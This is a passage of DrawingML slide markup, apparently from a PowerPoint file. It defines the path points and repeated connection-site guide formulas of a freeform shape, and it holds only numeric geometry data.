                  <a:pt x="852700" y="5608558"/>
                  <a:pt x="841664" y="5606907"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="832028" y="5599147"/>
                  <a:pt x="778646" y="5598835"/>
                  <a:pt x="761161" y="5602820"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="713282" y="5619272"/>
                  <a:pt x="663271" y="5589736"/>
                  <a:pt x="624746" y="5601972"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="609242" y="5601233"/>
                  <a:pt x="598997" y="5599815"/>
                  <a:pt x="591545" y="5598288"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="577646" y="5594621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34488" y="5594621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34488" y="5592586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10190" y="5582821"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3916" y="5576757"/>
                  <a:pt x="28" y="5568387"/>
                  <a:pt x="0" y="5559138"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2822796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4283" y="2814726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39" y="2804856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39" y="58894"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="93" y="49664"/>
                  <a:pt x="3991" y="41318"/>
                  <a:pt x="10261" y="35273"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34488" y="25556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34488" y="20985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6685573" y="25681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6760964" y="17249"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6762236" y="17197"/>
                  <a:pt x="6793057" y="17710"/>
                  <a:pt x="6794620" y="17095"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6815999" y="17800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6823278" y="25835"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6840241" y="29113"/>
                  <a:pt x="6891296" y="28327"/>
                  <a:pt x="6920759" y="28825"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7009730" y="25305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7022946" y="28825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7113950" y="26241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7140925" y="28825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7506591" y="28825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7517367" y="26513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7573249" y="18963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7654431" y="11880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7709924" y="4191"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7724138" y="3407"/>
                  <a:pt x="7727397" y="7874"/>
                  <a:pt x="7739720" y="717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16249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6471630-34CD-450E-B333-E697948643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E1D602E-9706-47F7-A6A5-BA10295C8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03630" y="4300355"/>
            <a:ext cx="9288370" cy="2557645"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 2625728 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 2625728 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 304639 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8582666 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 291389 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 2625728 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 304639 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 8582666 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 291389 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 744029 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 304639 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 8582666 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 291389 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 744029 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 304639 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 7367558 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 414127 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 744029 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 8081033 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 341461 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 7367558 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 414127 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1906160 h 1930234"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1893063 h 1930234"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1818002 h 1930234"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1778123 h 1930234"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1768261 h 1930234"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1721763 h 1930234"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1670975 h 1930234"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1520932 h 1930234"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1399105 h 1930234"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1336552 h 1930234"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1289456 h 1930234"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1230476 h 1930234"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1148357 h 1930234"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1084102 h 1930234"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1028172 h 1930234"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 964153 h 1930234"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 951121 h 1930234"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 816109 h 1930234"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 307021 h 1930234"/>
              <a:gd name="connsiteX22" fmla="*/ 8081033 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 413541 h 1930234"/>
              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 7528 h 1930234"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 227269 h 1930234"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 72325 h 1930234"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1906160 h 1930234"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1893063 h 1930234"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1818002 h 1930234"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1778123 h 1930234"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1768261 h 1930234"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1721763 h 1930234"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1670975 h 1930234"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1520932 h 1930234"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1399105 h 1930234"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1336552 h 1930234"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1289456 h 1930234"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1230476 h 1930234"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1148357 h 1930234"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1084102 h 1930234"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1028172 h 1930234"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 964153 h 1930234"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 951121 h 1930234"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 816109 h 1930234"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 307021 h 1930234"/>
              <a:gd name="connsiteX22" fmla="*/ 8301962 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 118969 h 1930234"/>
